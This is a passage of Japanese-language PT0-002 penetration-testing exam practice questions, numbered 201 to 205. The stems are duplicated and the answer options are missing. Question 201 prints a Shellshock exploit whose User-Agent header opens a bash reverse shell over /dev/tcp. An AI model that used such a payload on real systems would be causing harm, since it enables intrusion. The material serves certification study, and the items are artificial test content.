PT0-002 試験問題 201
ペネトレーション テスターが 10.10.1.1 で脆弱な Web サーバーを発見しました。次に、テスターは Web エクスプロイトを送信する Python スクリプトを編集し、次のコードを見つけます。
エクスプロイト = {"ユーザー エージェント": "() { 無視されました;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept":
"テキスト/html,アプリケーション/xhtml+xml,アプリケーション/xml"}
サーバーが実行されているユーザー コンテキストを決定するために、テスターはスクリプトに対して次の編集のうちどれを行う必要がありますか?
エクスプロイト = {"ユーザー エージェント": "() { 無視されました;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept":
"テキスト/html,アプリケーション/xhtml+xml,アプリケーション/xml"}
サーバーが実行されているユーザー コンテキストを決定するために、テスターはスクリプトに対して次の編集のうちどれを行う必要がありますか?
PT0-002 試験問題 202
あなたは、Web サーバーの強化を任務とするセキュリティ アナリストです。
悪意のあるものとしてフラグが付けられた HTTP ペイロードのリストが与えられました。
説明書
次の攻撃シグネチャを考慮して、攻撃の種類を特定し、今後の攻撃を防ぐために関連する修復策を特定します。
シミュレーションの初期状態に戻したい場合は、[すべてリセット] ボタンをクリックしてください。
悪意のあるものとしてフラグが付けられた HTTP ペイロードのリストが与えられました。
説明書
次の攻撃シグネチャを考慮して、攻撃の種類を特定し、今後の攻撃を防ぐために関連する修復策を特定します。
シミュレーションの初期状態に戻したい場合は、[すべてリセット] ボタンをクリックしてください。
PT0-002 試験問題 203
ペネトレーション テスターは、あるエンゲージメントで使用する次のスクリプトを作成しました。
このスクリプトは次のどのアクションを実行しますか?
このスクリプトは次のどのアクションを実行しますか?
PT0-002 試験問題 204
侵入テスト中は、制限されたユーザー インターフェイスを備えたシステムにアクセスできます。このマシンは、ポート スキャンを希望する隔離されたネットワークにアクセスできるようです。
説明書
コードセグメントを分析して、ポートスキャンスクリプトを完了するためにどのセクションが必要かを判断します。
適切な要素を正しい場所にドラッグして、スクリプトを完成させます。
シミュレーションの初期状態に戻したい場合は、[すべてリセット] ボタンをクリックしてください。
説明書
コードセグメントを分析して、ポートスキャンスクリプトを完了するためにどのセクションが必要かを判断します。
適切な要素を正しい場所にドラッグして、スクリプトを完成させます。
シミュレーションの初期状態に戻したい場合は、[すべてリセット] ボタンをクリックしてください。
PT0-002 試験問題 205
次のコードがあるとします。システムは次のデータ構造のうちどれですか?